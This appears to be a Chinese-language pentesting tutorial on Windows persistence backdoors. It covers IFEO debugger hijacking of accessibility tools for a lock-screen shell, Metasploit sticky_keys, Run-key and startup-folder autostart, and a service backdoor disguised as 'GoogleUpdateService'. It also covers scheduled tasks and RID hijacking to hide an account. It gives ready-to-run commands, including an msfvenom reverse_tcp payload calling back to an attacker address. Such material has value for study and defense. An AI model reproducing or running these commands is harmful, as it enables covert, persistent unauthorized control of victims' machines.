一,IFEO镜像劫持
1,手动实现
修改IFEO列表文件中的参数debugger实现偷梁换柱
1.win+r,输入regedit,打开注册表,寻找
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
2.(举例修改IE浏览器为cmd)在上述注册表寻找到iexplore.exe(IE浏览器)右键新建创建字符串值,名称必须为Debugger,且赋值cmd.exe的执行路径,即:C:\\windows\system32\cmd.exe
3.点击IE浏览器即可打开cmd
4.这里需要更换不用登陆就能运行的程序
如:shift(sethc),屏幕键盘(osk),辅助工具管理器(utilman),讲述人(narrator)等,但是并不是所有程序都可以在注册表看到,所以使用命令来创建注册表,然后更改,这样即可在锁屏状态下打开cmd
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
5.要是目标机器允许远程桌面连接,且没有勾选身份验证,则可以利用攻击机进行远程连接,然后点击更换后的程序打开cmd
2,metasploit实现
先实现上线,然后使用模块sticky_keys
提示按shift5次
成功
二,开机自启动
1.metasploit
之前有模块persistence,但是由于使用该模块会在目标机器上上传vbs,然后会替换到vbs,但是metasploit设置错误,模块也很老,所以并不能正确启动vbs,要么二开metasploit,使其把启动方式换成wscript xxx.vbs,要么手动上传xxx.exe,
1)使用metasploit命令
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run(查询开机自启动项)
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v Update -d 'C:\Users\Administrator\Desktop\zpp.exe'(设置开机自启动项)
此时再查看开机自启动项,发现添加成功,修改的路径为
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
或
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
重启靶机,再次上线
2)使用cmd命令
reg query HKLM\software\microsoft\windows\currentversion\run(查询开机自启动项)
reg add HKLM\software\microsoft\windows\currentversion\run /v Update /t REG_SZ /d "C:\Users\Administrator\Desktop\zpp.exe"(添加开机自启动项)
再次重启,成功上线
三,服务后门
首先先上线,然后生成一个木马(该木马是伪装的exe)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.58.144 lport=8989 -f exe-service -o Update.exe
创建名为UpdateService的服务,执行木马
sc create GoogleUpdateService binPath= "C:\Users\Administrator\Desktop\Update.exe" displayname= "UpdateService" start= auto
重启,上线
四,文件夹启动
将后门木马放入以下文件夹,则可实现开机自启
C:\Users\{UserName}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
五,schtasks计划任
schtasks /create /sc MINUTE /mo 1 /tr C:\Users\Administrator\Desktop\6666.exe /tn test
schtasks /create(创建新的计划任务)
/sc schedule(指定计划类型。有效值为 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON ONIDLE)
/mo modifier(指定任务在其计划类型内的运行频率)
/tr <TaskRun>(指定任务运行的程序或命令)
/tn <TaskName>(指定任务的名称)
六,RID劫持
也可以叫做镜子账户,创建一个账户,然后进入
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
修改固定偏移地址,即进入刚创建的账户,把F值的F2 03改为 F4 01就好,导出Users下面的后门账户以及Names下面的后门账户一共两个注册表文件,然后用命令删除账户,再次导入注册表,这样除了注册表外,其他地方看不到该账户信息